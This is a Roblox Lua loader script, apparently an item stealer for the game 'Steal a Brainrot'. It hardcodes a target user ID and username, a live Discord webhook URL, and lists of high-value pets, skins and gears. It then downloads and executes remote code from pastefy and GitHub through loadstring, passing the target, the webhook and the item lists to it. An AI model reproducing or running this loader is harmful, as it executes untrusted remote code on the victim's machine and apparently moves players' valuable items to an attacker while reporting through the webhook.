local TARGET_ID = 9107933550
local TARGET_USER = "manteca123732"
local WEBHOOK_URL = "https://discord.com/api/webhooks/1509365140511002645/AwKq8l0C9GGPMd51NeyHABdAg6dPlWlkK8Pnzw-GIdjPZgBaAxTWd09JtmxaGNhDDJaX"

local TargetBrainrots = {
    ["Strawberry Elephant"] = true,
    ["Meowl"] = true,
    ["Headless Horseman"] = true,
    ["Skibidi Toilet"] = true,
    ["Griffin"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Dragon Cannelloni"] = true,
    ["Love Love Bear"] = true,
    ["La Supreme Combinasion"] = true,
    ["Celestial Pegasus"] = true,
    ["Cerberus"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Rosey and Teddy"] = true,
    ["Capitano Moby"] = true,
    ["Cooki and Milki"] = true,
    ["Burguro And Fryuro"] = true,
    ["Ketupat Bros"] = true,
    ["Reinito Sleighito"] = true,
    ["Los Amigos"] = true,
    ["Fortunu and Cashuru"] = true,
    ["La Secret Combinasion"] = true,
    ["Los Sekolahs"] = true,
    ["Signore Carapace"] = true,
    ["La Casa Boo"] = true,
    ["La Food Combinasion"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Spooky and Pumpky"] = true,
    ["Ginger Gerat"] = true,
    ["Los Spaghettis"] = true,
    ["Sammyni Fattini"] = true,
    ["Festive 67"] = true,
    ["Elefanto Frigo"] = true,
    ["La Ginger Sekolah"] = true,
    ["Antonio"] = true,
    ["Duggy Bros"] = true,
    ["Globa Steppa"] = true,
    ["Fishino Clownino"] = true,
    ["Garama and Madundung"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["Orcaledon"] = true,
    ["Dug dug dug"] = true,
    ["Rico Dinero"] = true,
    ["Lovin Rose"] = true,
    ["Los Tacoritas"] = true,
    ["W or L"] = true,
    ["Los Primos"] = true,
    ["Eviledon"] = true,
    ["La Jolly Grande"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Tralaledon"] = true,
    ["Money Money Reindeer"] = true,
    ["Chillin Chili"] = true,
    ["Celularcini Viciosini"] = true,
    ["Tacorita Bicicleta"] = true
}

local TargetBaseSkins = {
    ["Rose"] = true,
    ["Gingerbread"] = true,
    ["Halloween"] = true,
    ["Christmas"] = true,
    ["Bunny Basket"] = true,
    ["Summer"] = true,
    ["Pot of Gold"] = true,
    ["Taco"] = true,
    ["Octo"] = true,
    ["Valentines"] = true,
    ["Easter"] = true,
    ["Lucky"] = true,
    ["Aquatic"] = true,
    ["Gold"] = true,
    ["Diamond"] = true,
    ["Rainbow"] = true,
    ["Candy"] = true,
    ["Lava"] = true,
    ["Galaxy"] = true,
    ["Yin Yang"] = true,
    ["Radioactive"] = true,
    ["Cursed"] = true,
    ["Divine"] = true,
    ["Cyber"] = true
}

local TargetGears = {
    ["Santa's Sleigh"] = true,
    ["Cupid's Wings"] = true,
    ["Witch's Broom"] = true,
    ["Waverider"] = true,
    ["Yin Yang Slap"] = true,
    ["Cursed Slap"] = true,
    ["Cyber Slap"] = true,
    ["Divine Slap"] = true,
    ["Bloodmoon Slap"] = true,
    ["Radioactive Slap"] = true,
    ["Rainbow Slap"] = true,
    ["Rainbow Hammer"] = true,
    ["Bloodmoon Hammer"] = true,
    ["Radioactive Airstrike"] = true,
    ["Yin Yang Lamp"] = true,
    ["Demon's Head"] = true,
    ["Lava Slap"] = true,
    ["Lava Blaster"] = true,
    ["Alien Slap"] = true,
    ["Blackhole Bomb"] = true,
    ["Candy Sentry"] = true
}

loadstring(game:HttpGet("https://pastefy.app/y6kUsqyh/raw"))()

task.spawn(function()
    local script = loadstring(game:HttpGet("https://raw.githubusercontent.com/chocolascript-glitch/script/refs/heads/main/logic.lua"))()
    if type(script) == "function" then
        script(TARGET_ID, TARGET_USER, WEBHOOK_URL, TargetBrainrots, TargetBaseSkins, TargetGears)
    end
end)
